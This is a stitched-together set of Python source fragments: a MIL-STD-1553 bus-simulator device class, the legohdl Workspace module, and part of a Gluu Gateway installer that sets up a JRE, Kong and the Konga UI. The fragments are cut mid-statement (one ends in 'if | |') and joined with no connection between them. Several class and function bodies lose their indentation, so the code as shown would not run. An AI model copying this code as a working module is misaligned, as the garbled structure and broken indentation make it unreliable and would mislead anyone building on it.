    def __str__(self) -> str:
        prefix = super().__str__()
        return f'{prefix}(0x{self.data.hex()})'

    def get_data(self):
        """Return the raw two-byte payload."""
        return self.data

    @classmethod
    def pack(cls, data: List, is_float=False):
        """Pack a list of 32-bit numbers into two-byte Data words.

        Fix: the original packed with native byte order/alignment
        ('%si'/'%sf') while unpack() decodes explicit little-endian
        ('<%di'); both now use '<' so pack/unpack round-trips on any host.
        """
        if len(data) < 1:
            return []
        fmt = ('<%df' if is_float else '<%di') % len(data)
        d_bytes = struct.pack(fmt, *data)
        if len(d_bytes) % 2 != 0:
            raise ValueError(f'len {len(d_bytes)} is not even')
        # slice the packed buffer into 16-bit (two-byte) words
        return [Data(data=d_bytes[w * 2:(w + 1) * 2]) for w in range(len(d_bytes) // 2)]

    @classmethod
    def unpack(cls, data: List, is_float=False):
        """Inverse of pack(): join word payloads and decode 32-bit numbers.

        Accepts a mixed list of Data words and raw byte chunks.
        """
        d_bytes = b''.join(w.data if isinstance(w, Data) else w for w in data)
        if len(d_bytes) % 4 != 0:
            raise ValueError(f'len {len(d_bytes)} is not a multiplier of 4')
        # each word is 16 bits (two bytes) and each number is 32 bits,
        # so two words per number
        fmt = ("<%df" if is_float else "<%di") % (len(d_bytes) // 4)
        return struct.unpack(fmt, d_bytes)
# Command word issued on the bus to direct an RT to transmit or receive.
class Command(Word):
    def __init__(
        self,
        address=0,        # 5-bit RT address; 31 (0b11111) is reserved for broadcast
        tr=0,             # 0: receive data, 1: transmit data
        sub_address=2,    # 5-bit RT subaddress; 0 and 31 are reserved
        dword_count=0,    # number of data words following the command
        parity=0,         # parity bit over the last 16 bits
    ) -> None:
        super().__init__()
        for field, value in (
            ('address', address),
            ('tr', tr),
            ('sub_address', sub_address),
            ('dword_count', dword_count),
            ('parity', parity),
        ):
            setattr(self, field, value)

    def __str__(self) -> str:
        # same rendering as Status: '(ad-0, dw-0, ...)' sorted by name
        pairs = sorted(vars(self).items())
        return super().__str__() + '(' + ', '.join(k[:2] + '-' + str(v) for k, v in pairs) + ')'
# used to indicate which type of terminal this device should be
class Mode(Enum):
    """Role of a terminal on the bus."""
    RT = 1  # Remote Terminal
    BC = 2  # Bus Controller
    BM = 3  # Bus Monitor
# use to indicate the type of communication that is happening for each device
class State(Enum):
    """Communication state of a device; drives how incoming words are interpreted."""
    IDLE = 0          # connected, not transferring
    TRANSMIT = 1      # sending data words
    RECEIVE = 2       # accepting data words
    OFF = 3           # powered down / not participating
    WAIT = 4          # waiting on a response
    TRANSMIT_CMD = 5  # sending a command word (BC only, per act_bc2rt)
class BusABC():
    """Minimal bus interface; concrete buses override write()/recv()."""
    def write(self, device, words: List[Word]):
        """Send *words* on behalf of *device*; no-op in this abstract base."""
        pass
    def recv(self, device) -> Word:
        """Return the next word destined for *device*; no-op in this abstract base."""
        pass
'''
mode: type of this device: BC, RT or BM
state: way this device interprets the commands being sent over the bus
bus: ???
address: address of this device on the network between 0 and 31
queue: list of all messages this device received over the network it must process
event_handlers: ???
uuid: unique ID for this device
system: system this device is connected to
'''
class Device():
def __init__(
    self, bus: BusABC, mode=Mode.RT, address=-1, state=State.IDLE,
    id=None, system='', dword_count=0, **other_attributes) -> None:
    """Create a bus device with its role, address and backing memory/storage.

    Any extra keyword arguments are set verbatim as instance attributes.
    """
    # True when the word stream this device emits should be flagged as fake
    self.fake: bool = False
    # allows to determine whether the current command was cancelled during idle mode
    self.rt_cmd_cancelled = False
    # allows to count the number of commands pending on RT at a given time
    self.number_of_current_cmd = 0
    # current local clock of the RT (milliseconds; see clock())
    self.lclock: int = 0
    # current CMD 0 for T/R and 1 for MC
    self.ccmd: int = 0
    # True while this device participates in an ongoing broadcast
    self.in_brdcst = False
    self.mode: Mode = mode
    self.state: State = state
    self.bus: BusABC = bus
    self.address = address
    # UDP port this device can be reached on; -1 means not yet bound
    self.port = -1
    # event name -> handler callable, registered via on()
    self.event_handlers = {}
    self.id = uuid.uuid4().hex if not id else id
    self.system = system
    self.dword_count = dword_count
    for k, v in other_attributes.items():
        setattr(self, k, v)
    # memory/storage for the device
    # if we directly use these objects from the other classes,
    # it means the whole object needed to be copied over different processes
    # so we have to keep the memory/storage within this class (maybe large)
    # and provide interfaces to slice them
    # -- memory: linear layout of words (two-bytes)
    self.memory: List[bytes] = []
    # -- storage: key-(multi-val) object storage
    self.storage = defaultdict(list)
    # reference point for clock(); reset when the device turns on (set_state)
    self.clock_start = datetime.now()
def on(self, event_name, handler):
    """Register *handler* for *event_name* (a string or a class whose __name__ is used)."""
    key = event_name if isinstance(event_name, str) else event_name.__name__
    self.event_handlers[key] = handler
@ delay
def write(self, word: Word):
    """Send one word (or a list of words) to every reachable device via UDP.

    Decorated with @delay to simulate bus transfer time.
    """
    if not isinstance(word, list):
        word = [word]
    # lazily create the transmitting UDP socket on first write
    if not hasattr(self, 'sock_trans'):
        self.sock_trans = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock_trans.bind(('', 0))
    for w in word:
        # propagate this device's fake flag onto each outgoing word
        w.fake = self.fake
        # NOTE(review): self.bus is annotated BusABC but iterated with
        # .values() here -- at runtime it appears to be a mapping of
        # devices; confirm the intended type.
        for d in self.bus.values():
            if d.port > 0:
                self.sock_trans.sendto(w.to_bytes(), ('127.0.0.1', d.port))
def clock(self):
    """Milliseconds elapsed since clock_start; 0 while a non-monitor device is off."""
    if self.state == State.OFF and self.mode != Mode.BM:
        return 0
    elapsed = datetime.now() - self.clock_start
    return elapsed // timedelta(milliseconds=1)
def set_state(self, new_state):
    """Transition the device to *new_state*, logging the change when enabled."""
    if config.SYS_LOG_EVENT:
        # e.g. 'RT5 changed from State.IDLE to State.TRANSMIT' in green;
        # str(self.mode)[5:7] extracts the two-letter mode name from 'Mode.XX'
        log.info('\033[32m{}{}{} changed from {} to {}\033[39m'.format(
            str(self.mode)[5], str(self.mode)[6], self.address, self.state, new_state))
    # restart the local clock when the device is being turned on
    if self.state == State.OFF and new_state != State.OFF:
        self.clock_start = datetime.now()
    self.state = new_state
    # use to be:
    # log.info('{} change from {} to {}'.format(
    #     self.name(), self.state, new_state))
    # self.state = new_state
    # Now easier to backtrack the RTs
def mem_put(self, words: List[bytearray], addr=None):
    """Append *words* to device memory, or overwrite in place starting at *addr*.

    A single word is wrapped into a list. Returns the new memory length.

    Fix: the original tested isinstance(words, typing.List); checking
    against a typing alias is deprecated -- use the builtin list (same
    runtime behavior on supported versions).
    """
    if not isinstance(words, list):
        words = [words]
    if addr is None:
        self.memory.extend(words)
    else:
        # overwrite existing slots; assumes addr+len(words) <= len(memory) -- confirm
        for i in range(len(words)):
            self.memory[i + addr] = words[i]
    return len(self.memory)
def mem_get(self, start=0, end=None):
    """Return memory[start:end]; end=None means through the end.

    Fix: the original branched on `if end:` and returned memory[start:]
    when an explicit end WAS given (silently ignoring it) and
    memory[start:end] when it wasn't -- the condition was inverted. A
    single slice covers both cases, since a None end already means
    'to the end of the list'.
    """
    return self.memory[start:end]
def mem_unpack(self, is_float=False):
    """Decode the entire device memory back into 32-bit numbers via Data.unpack()."""
    return Data.unpack(self.memory, is_float=is_float)
def mem_reset(self):
    """Discard device memory by rebinding a fresh list (existing aliases are unaffected)."""
    self.memory = []
def store_get(self, key=None):
    """Return the list stored under *key*; storage is a defaultdict, so a missing key yields a new empty list."""
    return self.storage[key]
def store_append(self, data, key=None):
    """Append *data* to the list stored under *key*."""
    self.storage[key].append(data)
def store_set(self, data, key=None):
    """Replace the value stored under *key* with *data*."""
    self.storage[key] = data
'''
target: ID of target RT to send data to
words: set of data to send to target RT
'''
def act_bc2rt(self, target, words: List[Word], ignore_limit=False):
nwords = len(words)
if not ignore_limit:
if nwords > 31:
raise Exception("Max number is 31 (2^5=32)")
# first, send 'receive' command word with the target RT ID & amount of data
cmd = Command(address=target, dword_count=nwords, tr=0)
# set the state of this device to be transmitting data
# self.state = State.TRANSMIT # this is BC state
self.set_state(State.TRANSMIT_CMD)
# write the command word first, to notify the target device to receive data
self.write(cmd)
# send the data
self.set_state(State.TRANSMIT)
for w in words:
self.write(w)
if | |
# ------------------------------------------------------------------------------
# Project: legohdl
# Script: workspace.py
# Author: <NAME>
# Description:
# The Workspace class. A Workspace object has a path and a list of available
# vendors. This is what the user keeps their work's scope within for a given
# "organization".
# ------------------------------------------------------------------------------
import os, shutil, glob
import logging as log
from datetime import datetime
from .vendor import Vendor
from .apparatus import Apparatus as apt
from .cfg import Cfg, Section, Key
from .map import Map
from .git import Git
from .block import Block
class Workspace:
    """A user workspace: a local block path plus the vendors linked to it."""
    #store all workspaces in dictionary (name -> Workspace)
    Jar = Map()
    #active-workspace is a workspace object
    _ActiveWorkspace = None
    # hidden directory holding every workspace's cache and refresh log
    DIR = apt.fs(apt.HIDDEN+"workspaces/")
    # per-workspace file recording vendor refresh activity
    LOG_FILE = "refresh.log"
    # bounds for the refresh-rate setting; 1440 presumably minutes/day -- confirm units
    MIN_RATE = -1
    MAX_RATE = 1440
def __init__(self, name, path, vendors=None, ask=True):
    '''
    Create a workspace instance.

    Parameters:
        name (str): the identity for the workspace
        path (str): the local path where blocks will be looked for
        vendors ([str]): the list of vendors that are tied to this workspace
        ask (bool): will ask user if wishing to enter workspace path
    Returns:
        None
    '''
    #bug fix: default used to be a shared mutable list (vendors=[]);
    #normalize the None sentinel to a fresh list instead
    vendors = [] if vendors is None else vendors
    self._name = name
    #do not create workspace if the name is already taken
    if(self.getName().lower() in self.Jar.keys()):
        log.error("Skipping workspace "+self.getName()+" due to duplicate naming conflict.")
        return
    #set the path
    self._path = ''
    self.setPath(path)
    #do not create workspace if the path is empty
    if(self.getPath() == ''):
        if(ask == False):
            log.error("Skipping workspace "+self.getName()+" due to empty local path.")
            return
        else:
            #keep asking to set path until one is decided/input
            try:
                path = input("Enter path for workspace "+self.getName()+": ")
            except KeyboardInterrupt:
                apt.CFG.remove('workspace.'+self.getName())
                Workspace.save(inc_active=False)
                print()
                exit(log.info("Workspace not created."))
            while(self.setPath(path) == False):
                try:
                    path = input("Enter path for workspace "+self.getName()+": ")
                except KeyboardInterrupt:
                    apt.CFG.remove('workspace.'+self.getName())
                    Workspace.save(inc_active=False)
                    print()
                    exit(log.info("Workspace not created."))
    self._ws_dir = apt.fs(self.DIR+self.getName()+"/")
    #ensure all workspace hidden directories exist
    if(os.path.isdir(self.getDir()) == False):
        log.info("Setting up workspace "+self.getName()+"...")
        os.makedirs(self.getDir(), exist_ok=True)
    #create workspace's cache where installed blocks will be stored
    os.makedirs(self.getDir()+"cache", exist_ok=True)
    #create the refresh log if DNE
    if(os.path.isfile(self.getDir()+self.LOG_FILE) == False):
        open(self.getDir()+self.LOG_FILE, 'w').close()
    self._vendors = []
    #find all vendor objects by name and store in list
    for vndr in vendors:
        if(vndr.lower() in Vendor.Jar.keys()):
            self._vendors += [Vendor.Jar[vndr]]
        else:
            log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
        pass
    #add to class Jar
    self.Jar[self.getName()] = self
    pass
def setPath(self, p):
    '''
    Set the workspace's local path to a new value. Will ask user if okay
    to create the path if DNE.

    Parameters:
        p (str): the path string
    Returns:
        (bool): true if successfully changed the path attribute
    '''
    #an empty path can never be assigned
    if(p == '' or p == None):
        log.info("Local path for workspace "+self.getName()+" cannot be empty.")
        return False
    p = apt.fs(p)
    #existing path -> accept it directly
    if(os.path.exists(p)):
        self._path = p
        return True
    #path DNE -> ask the user before creating it
    if(apt.confirmation("Workspace "+self.getName()+"'s local path does not exist. Create "+p+"?") == False):
        log.info("Did not set "+p+" as local path.")
        return False
    os.makedirs(p, exist_ok=True)
    self._path = p
    return True
def setName(self, n):
    '''
    Change the workspace's name if the name is not already taken.

    Parameters:
        n (str): new name for workspace
    Returns:
        (bool): true if name successfully altered and updated in Jar
    '''
    #reject empty names
    if(n == '' or n == None):
        log.error("Workspace name cannot be empty.")
        return False
    #reject a name already claimed by another workspace
    if(n.lower() in self.Jar.keys()):
        log.error("Cannot rename workspace to "+n+" due to name conflict.")
        return False
    #drop the old key from the Jar
    if(self.getName().lower() in self.Jar.keys()):
        del self.Jar[self.getName()]
    #move the hidden directory to follow the new name
    new_dir = apt.fs(self.DIR+n+"/")
    if(hasattr(self, "_ws_dir")):
        os.rename(self.getDir(), new_dir)
    self._ws_dir = new_dir
    #apply the new name and re-register in the Jar
    self._name = n
    self.Jar[self.getName()] = self
    return True
def remove(self):
    '''
    Removes the workspace object from the Jar and its hidden directory.

    Also deletes the workspace's entry from the cfg file on disk.

    Parameters:
        None
    Returns:
        None
    '''
    log.info("Removing workspace "+self.getName()+"...")
    #delete the hidden workspace directory
    shutil.rmtree(self.getDir(), onerror=apt.rmReadOnly)
    #remove from class Jar
    del self.Jar[self.getName()]
    #remove from cfg file
    apt.CFG.remove('workspace.'+self.getName())
    apt.CFG.write()
    pass
def linkVendor(self, vndr):
    '''
    Attempts to add a vendor to the workspace's vendor list.

    Parameters:
        vndr (str): name of the vendor to add
    Returns:
        (bool): true if the vendor list was modified (successful add)
    '''
    #unknown vendor -> warn and bail
    if(vndr.lower() not in Vendor.Jar.keys()):
        log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
        return False
    vndr_obj = Vendor.Jar[vndr]
    #already linked -> nothing to modify
    if(vndr_obj in self.getVendors()):
        log.info("Vendor "+vndr_obj.getName()+" is already linked to this workspace.")
        return False
    log.info("Linking vendor "+vndr_obj.getName()+" to the workspace...")
    self._vendors += [vndr_obj]
    return True
def setVendors(self, vndrs):
    '''
    Overrides entire _vendors attr by setting it equal to 'vndrs'.

    Parameters:
        vndrs ([str]): list of vendors
    Returns:
        (bool): success if all vendors listed were added
    '''
    #reset vendors list
    self._vendors = []
    success = True
    #iterate through every given vendor
    for vndr in vndrs:
        #verify the vendor exists
        if(vndr.lower() in Vendor.Jar.keys()):
            vndr_obj = Vendor.Jar[vndr]
            #check if the vendor has already been linked
            if(vndr_obj in self.getVendors()):
                log.info("Vendor "+vndr_obj.getName()+" is already linked to this workspace.")
            #link the vendor to this workspace
            else:
                log.info("Linking vendor "+vndr_obj.getName()+" to the workspace...")
                self._vendors += [vndr_obj]
        else:
            log.warning("Could not link unknown vendor "+vndr+" to "+self.getName()+".")
            #bug fix: was 'sucess = False' (typo), which bound a throwaway
            #variable so the method always returned True even on failure
            success = False
    return success
def unlinkVendor(self, vndr):
    '''
    Attempts to remove a vendor from the workspace's vendor list.

    Parameters:
        vndr (str): name of the vendor to remove
    Returns:
        (bool): true if the vendor list was modified (successful remove)
    '''
    #unknown vendor -> warn and bail
    if(vndr.lower() not in Vendor.Jar.keys()):
        log.warning("Could not unlink unknown vendor "+vndr+" from "+self.getName()+".")
        return False
    vndr_obj = Vendor.Jar[vndr]
    #not linked -> nothing to modify
    if(vndr_obj not in self.getVendors()):
        log.info("Vendor "+vndr_obj.getName()+" is already unlinked from the workspace.")
        return False
    log.info("Unlinking vendor "+vndr_obj.getName()+" from the workspace...")
    self._vendors.remove(vndr_obj)
    return True
def loadBlocks(self, id_dsgns=False):
    '''
    Loads all blocks found at all levels: dnld (workspace path), instl (workspace
    cache), avail (workspace vendors).

    When id_dsgns is True, this method uses the 'multi-develop' setting to
    determine which level has precedence in loadHDL().

    'multi-develop' set to False will only loadHDL() from cache. 'multi-develop'
    set to True will first try to loadHDL() from dnld, and if DNE, then try
    to loadHDL() from block's cache.

    Either way, if inside a current block, that block's HDL will be loaded over
    its cache.

    Dynamically creates _visible_blocks ([Block]) attribute to be reused.

    Parameters:
        id_dsgns (bool): identify design units (loadHDL) from blocks
    Returns:
        _visible_blocks ([Block]): list of all block objects in cache or path
    '''
    #memoized: reuse the list computed by an earlier call
    if(hasattr(self, "_visible_blocks")):
        return self._visible_blocks
    self._visible_blocks = []
    #read the setting for multi-develop
    mult_dev = apt.getMultiDevelop()
    #1. Search for downloaded blocks
    #glob on the local workspace path
    #print("Local Blocks on:",self.getPath())
    marker_files = glob.glob(self.getPath()+"**/*/"+apt.MARKER, recursive=True)
    #iterate through all found downloads
    for mf in marker_files:
        b = Block(mf, self, Block.Level.DNLD)
        #if the user is within a current block, load the HDL from its DNLD level (not INSTL)
        if(mult_dev == True or Block.getCurrent(bypass=True) == b):
            self._visible_blocks += [b]
            if(id_dsgns):
                b.loadHDL()
        pass
    #2. Search for installed blocks
    #glob on the workspace cache path
    #print("Cache Blocks on:",self.getCachePath())
    marker_files = glob.glob(self.getCachePath()+"**/*/"+apt.MARKER, recursive=True)
    #iterate through all found installations
    for mf in marker_files:
        #the block must also have a valid git repository at its root
        root,_ = os.path.split(mf)
        #note: only the head installation has the git repository
        if(Git.isValidRepo(root, remote=False)):
            b = Block(mf, self, Block.Level.INSTL)
            #get the spot for this block's download
            dnld_b = Block.Inventory[b.M()][b.L()][b.N()][Block.Level.DNLD.value]
            #add this block if a download DNE or the dnld does not match current when
            #not in multi-develop mode
            if(dnld_b == None or (mult_dev == False and Block.getCurrent(bypass=True) != dnld_b)):
                self._visible_blocks += [b]
                if(id_dsgns):
                    b.loadHDL()
        pass
    #3. Search for available blocks
    #glob on each vendor path
    marker_files = []
    #find all marker files in each of the workspace's vendors
    for vndr in self.getVendors():
        marker_files += glob.glob(vndr.getVendorDir()+"**/*/"+apt.MARKER, recursive=True)
    #iterate through all found availables
    for mf in marker_files:
        b = Block(mf, self, Block.Level.AVAIL)
        #do not add this block to list of visible blocks because it has no
        #units associated with it, only metadata
        pass
    #4. ID all specific version blocks if identifying designs (except current block)
    spec_vers_blocks = []
    for vis_block in self._visible_blocks:
        if(vis_block == Block.getCurrent(bypass=True)):
            continue
        for spec_block in vis_block.getInstalls().values():
            spec_vers_blocks += [spec_block]
            if(id_dsgns):
                spec_block.loadHDL()
            pass
        pass
    self._visible_blocks += spec_vers_blocks
    return self._visible_blocks
def shortcut(self, title, req_entity=False, visibility=True, ref_current=True):
'''
| |
continue
self.run([self.cmd_rm, '-rf', '%s/%s/migrations' % (self.dist_kong_plugins_folder, plugin)])
self.run([self.cmd_rm, '-R', '%s/%s/daos.lua' % (self.dist_kong_plugins_folder, plugin)])
def install_jre(self):
    """Extract the bundled server JRE 8 under /opt and register it system-wide.

    Creates the /opt/jre symlink, fixes bin permissions, exports JAVA_HOME
    and registers the 'java' alternative for the detected distribution.
    """
    self.log_it("Installing server JRE 1.8 %s..." % self.jre_version)
    jre_archive = 'server-jre-8u%s-linux-x64.tar.gz' % self.jre_version
    try:
        self.log_it("Extracting %s into %s/%s" % (jre_archive, self.gg_dist_app_folder, jre_archive))
        self.run(['tar', '-xzf', '%s/%s' % (self.gg_dist_app_folder, jre_archive), '-C', '/opt/', '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
    # bug fix: a bare 'except:' also swallows SystemExit/KeyboardInterrupt;
    # catch Exception instead (logging behavior unchanged)
    except Exception:
        self.log_it("Error encountered while extracting archive %s" % jre_archive)
        self.log_it(traceback.format_exc(), True)
    self.run([self.cmd_ln, '-sf', self.jre_destination_path, self.jre_home])
    self.run([self.cmd_chmod, '-R', '755', '%s/bin/' % self.jre_destination_path])
    with open('/etc/environment', 'a') as f:
        # NOTE(review): appended without a newline -- if /etc/environment does
        # not end in one this merges with the previous line; confirm.
        f.write('JAVA_HOME=/opt/jre')
    if self.os_type in [Distribution.Ubuntu, Distribution.Debian]:
        self.run([self.cmd_update_alternatives, '--install', '/usr/bin/java', 'java', '%s/bin/java' % (self.jre_home), '1'])
    elif self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
        self.run([self.cmd_alternatives, '--install', '/usr/bin/java', 'java', '%s/bin/java' % (self.jre_home), '1'])
def config_gluu_gateway_ui(self):
    """Install the Konga (GG UI) node/bower packages, optionally register an
    OXD client for the UI, render its config file and run the DB migration."""
    self.log_it('Installing gluu_gateway_ui node packages...')
    print ('Installing gluu_gateway_ui node packages...')
    # ensure a 'node' binary exists (some distros only ship 'nodejs')
    if not os.path.exists(self.cmd_node):
        # NOTE(review): '`which nodejs`' is passed as a literal argv element;
        # backticks are only expanded by a shell, so this likely creates a
        # link to the literal string -- confirm how self.run executes it.
        self.run([self.cmd_ln, '-s', '`which nodejs`', self.cmd_node])
    try:
        self.run([self.cmd_mkdir, '-p', self.gg_node_modules_folder])
        self.log_it("Extracting %s into %s" % (self.gg_node_modules_archive, self.gg_node_modules_folder))
        self.run(['tar', '--strip', '1', '-xzf', '%s/%s' % (self.gg_dist_folder, self.gg_node_modules_archive), '-C', self.gg_node_modules_folder, '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
    except:
        self.log_it("Error encountered while extracting archive %s" % self.gg_node_modules_archive)
        self.log_it(traceback.format_exc(), True)
    try:
        self.run([self.cmd_mkdir, '-p', self.gg_bower_modules_folder])
        self.log_it("Extracting %s into %s" % (self.gg_bower_modules_archive, self.gg_bower_modules_folder))
        self.run(['tar', '--strip', '1', '-xzf', '%s/%s' % (self.gg_dist_folder, self.gg_bower_modules_archive), '-C', self.gg_bower_modules_folder, '--no-xattrs', '--no-same-owner', '--no-same-permissions'])
    except:
        self.log_it("Error encountered while extracting archive %s" % self.gg_bower_modules_archive)
        self.log_it(traceback.format_exc(), True)
    if self.generate_client:
        msg = 'Creating OXD OP client for Gluu Gateway GUI used to call oxd-server endpoints...'
        self.log_it(msg)
        print (msg)
        # register a new client with the oxd server and keep its credentials
        oxd_registration_endpoint = self.gluu_gateway_ui_oxd_web + '/register-site'
        redirect_uri = 'https://' + self.gluu_gateway_ui_redirect_uri + ':' + self.gluu_gateway_ui_port
        payload = {
            'op_host': self.gluu_gateway_ui_op_host,
            'redirect_uris': [redirect_uri],
            'post_logout_redirect_uris': [redirect_uri],
            'scope': ['openid', 'oxd', 'permission', 'username'],
            'grant_types': ['authorization_code', 'client_credentials'],
            'client_name': 'KONGA_GG_UI_CLIENT'
        }
        oxd_registration_response = self.http_post_call(oxd_registration_endpoint, payload)
        self.gluu_gateway_ui_oxd_id = oxd_registration_response['oxd_id']
        self.gluu_gateway_ui_client_secret = oxd_registration_response['client_secret']
        self.gluu_gateway_ui_client_id = oxd_registration_response['client_id']
    # Render gluu_gateway_ui property
    self.run([self.cmd_touch, os.path.split(self.dist_gluu_gateway_ui_config_file)[-1]],
             self.dist_gluu_gateway_ui_config_folder, os.environ.copy(), True)
    self.render_template_in_out(self.dist_gluu_gateway_ui_config_file, self.template_folder, self.dist_gluu_gateway_ui_config_folder)
    # konga db migration
    self.run(['npm', 'run', 'db-migrate', 'postgres://postgres:%s@localhost:5432/konga' % self.pg_pwd], self.dist_gluu_gateway_ui_folder, os.environ.copy(), True)
def is_ip(self, address):
    """Return True if *address* parses as an IPv4 address (per inet_aton)."""
    try:
        socket.inet_aton(address)
    except socket.error:
        return False
    return True
def log_it(self, msg, error_log=False):
if error_log:
f = open(self.log_error, 'a')
f.write('%s %s\n' % (time.strftime('%X %x'), msg))
f.close()
f = open(self.log, 'a')
f.write('%s %s\n' % (time.strftime('%X %x'), msg))
f.close()
def make_boolean(self, c):
if c in ['t', 'T', 'y', 'Y']:
return True
if c in ['f', 'F', 'n', 'N']:
return False
self.log_it("make_boolean: invalid value for true|false: " + c, True)
def make_folders(self):
try:
self.run([self.cmd_mkdir, '-p', self.cert_folder])
self.run([self.cmd_mkdir, '-p', self.output_folder])
except:
self.log_it("Error making folders", True)
self.log_it(traceback.format_exc(), True)
    def prompt_for_properties(self):
        """Interactively collect all installation settings from the operator.

        Populates the certificate fields, the Postgres password, the OP host
        and the Konga/oxd client settings on self. Called once before any
        templates are rendered.
        """
        # Certificate configuration
        self.ip = self.get_ip()
        self.host_name = self.get_prompt('Enter Hostname', self.detect_host_name())
        print ('The next few questions are used to generate the Kong self-signed HTTPS certificate')
        self.country_code = self.get_prompt('Enter two letter Country Code')
        self.state = self.get_prompt('Enter two letter State Code')
        self.city = self.get_prompt('Enter your city or locality')
        self.org_name = self.get_prompt('Enter Organization Name')
        self.admin_email = self.get_prompt('Enter Email Address')
        # Postgres configuration
        msg = """
        If you already have a postgres user and database in the
        Postgres DB, then enter existing password, otherwise enter new password: """
        print (msg)
        # get_pw() supplies a generated default; getpass hides the typed value.
        pg = self.get_pw()
        self.pg_pwd = getpass.getpass(prompt='Password [%s] : ' % pg) or pg
        # We are going to ask for 'OP host_name' regardless of whether we're installing oxd or not
        self.gluu_gateway_ui_op_host = 'https://' + self.get_prompt('OP Server Host')
        # Konga Configuration
        msg = """
        The next few questions are used to configure Konga.
        If you are connecting to an existing oxd server from other the network,
        make sure it's available from this server."""
        print (msg)
        self.gluu_gateway_ui_oxd_web = self.get_prompt('Enter your existing OXD server URL')
        self.generate_client = self.make_boolean(self.get_prompt("Generate client credentials to call oxd-server API's? (y - generate, n - enter existing client credentials manually)", 'y'))
        if not self.generate_client:
            # Manual mode: the operator supplies an existing oxd client.
            self.gluu_gateway_ui_oxd_id = self.get_prompt('OXD Id')
            self.gluu_gateway_ui_client_id = self.get_prompt('Client Id')
            self.gluu_gateway_ui_client_secret = self.get_prompt('Client Secret')
def install_config_kong(self):
# Install Kong
kong_package_file = ''
install_kong_cmd = []
if self.os_type == Distribution.Ubuntu and self.os_version == '18':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.ubuntu18_kong_file)
install_kong_cmd = [self.cmd_dpkg, '--install', kong_package_file]
if self.os_type == Distribution.CENTOS and self.os_version == '7':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.centos7_kong_file)
install_kong_cmd = [self.cmd_rpm, '--install', '--verbose', '--hash', kong_package_file]
if self.os_type == Distribution.RHEL and self.os_version == '7':
kong_package_file = "%s/%s" % (self.gg_dist_app_folder, self.rhel7_kong_file)
install_kong_cmd = [self.cmd_rpm, '--install', '--verbose', '--hash', kong_package_file]
if not os.path.exists(kong_package_file):
self.log_it("%s is not found" % kong_package_file)
sys.exit(0)
self.run(install_kong_cmd)
if self.os_type == Distribution.Ubuntu and self.os_version in ['18']:
self.kong_lua_ssl_trusted_certificate = "/etc/ssl/certs/ca-certificates.crt"
if self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
self.kong_lua_ssl_trusted_certificate = "/etc/ssl/certs/ca-bundle.crt"
self.render_template_in_out(self.dist_kong_config_file, self.template_folder, self.dist_kong_config_folder)
def render_template_in_out(self, file_path, template_folder, output_folder):
self.log_it("Rendering template %s" % file_path)
fn = os.path.split(file_path)[-1]
f = open(os.path.join(template_folder, fn))
template_text = f.read()
f.close()
newFn = open(os.path.join(output_folder, fn), 'w+')
newFn.write(template_text % self.__dict__)
newFn.close()
    def run(self, args, cwd=None, env=None, use_wait=False, shell=False):
        """Execute an external command, logging its output and errors.

        Args:
            args: Command and arguments as a list (a string only makes sense
                together with shell=True — NOTE(review): ' '.join(args) below
                assumes a list of str; confirm callers never pass a string).
            cwd: Working directory for the child process.
            env: Environment mapping for the child process.
            use_wait: When True, wait for the exit code and log it instead of
                capturing stdout/stderr.
            shell: Passed through to subprocess.Popen.
        """
        self.log_it('Running: %s' % ' '.join(args))
        try:
            p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd, env=env, shell=shell)
            if use_wait:
                code = p.wait()
                self.log_it('Run: %s with result code: %d' % (' '.join(args), code))
            else:
                # communicate() also reaps the process. NOTE(review): on
                # Python 3 output/err are bytes and are logged unconverted.
                output, err = p.communicate()
                if output:
                    self.log_it(output)
                if err:
                    self.log_it(err, True)
        except:
            # Best-effort: never let a failed subprocess abort the installer.
            self.log_it("Error running command : %s" % " ".join(args), True)
            self.log_it(traceback.format_exc(), True)
def migrate_kong(self):
print ("Migrating kong db...")
self.log_it("Migrating kong db...")
self.run([self.cmd_kong, "migrations", "up"])
self.run([self.cmd_kong, "migrations", "finish"])
def start_gg_service(self):
print ("Starting %s..." % self.gg_service)
self.log_it("Starting %s..." % self.gg_service)
if self.os_type == Distribution.Ubuntu and self.os_version in ['18']:
self.run([self.cmd_systemctl, 'stop', self.gg_service])
self.run([self.cmd_systemctl, 'start', self.gg_service])
self.run([self.cmd_systemctl, 'enable', self.gg_service])
elif self.os_type in [Distribution.CENTOS, Distribution.RHEL]:
self.run([self.cmd_systemctl, 'stop', self.gg_service])
self.run([self.cmd_systemctl, 'start', self.gg_service])
self.run([self.cmd_systemctl, 'enable', self.gg_service])
def copy_file(self, in_file, dest_folder):
try:
shutil.copy(in_file, dest_folder)
self.log_it("Copied %s to %s" % (in_file, dest_folder))
except:
self.log_it("Error copying %s to %s" % (in_file, dest_folder), True)
self.log_it(traceback.format_exc(), True)
    def disable_warnings(self):
        """Silence urllib3's InsecureRequestWarning.

        The installer talks to oxd over HTTPS with verify=False, so the
        per-request warnings would otherwise flood the console.
        """
        if self.os_type in [Distribution.Ubuntu, Distribution.CENTOS, Distribution.RHEL, Distribution.Debian]:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def choose_from_list(self, list_of_choices, choice_name="item", default_choice_index=0):
return_value = None
choice_map = {}
chosen_index = 0
print ("\nSelect the number for the %s from the following list:" % choice_name)
for choice in list_of_choices:
choice_map[chosen_index] = choice
chosen_index += 1
print (" [%i] %s" % (chosen_index, choice))
while not return_value:
choice_number = self.get_prompt("Please select a number listed above", str(default_choice_index + 1))
try:
choice_number = int(choice_number) - 1
if (choice_number >= 0) & (choice_number < len(list_of_choices)):
return_value = choice_map[choice_number]
else:
print ('"%i" is not a valid choice' % (choice_number + 1))
except:
print ('Cannot convert "%s" to a number' % choice_number)
self.log_it(traceback.format_exc(), True)
return return_value
def detect_os_type(self):
try:
p = distro.linux_distribution()
self.os_type = p[0].split()[0].lower()
self.os_version = p[1].split('.')[0]
except:
self.os_type, self.os_version = self.choose_from_list(self.os_types, "Operating System")
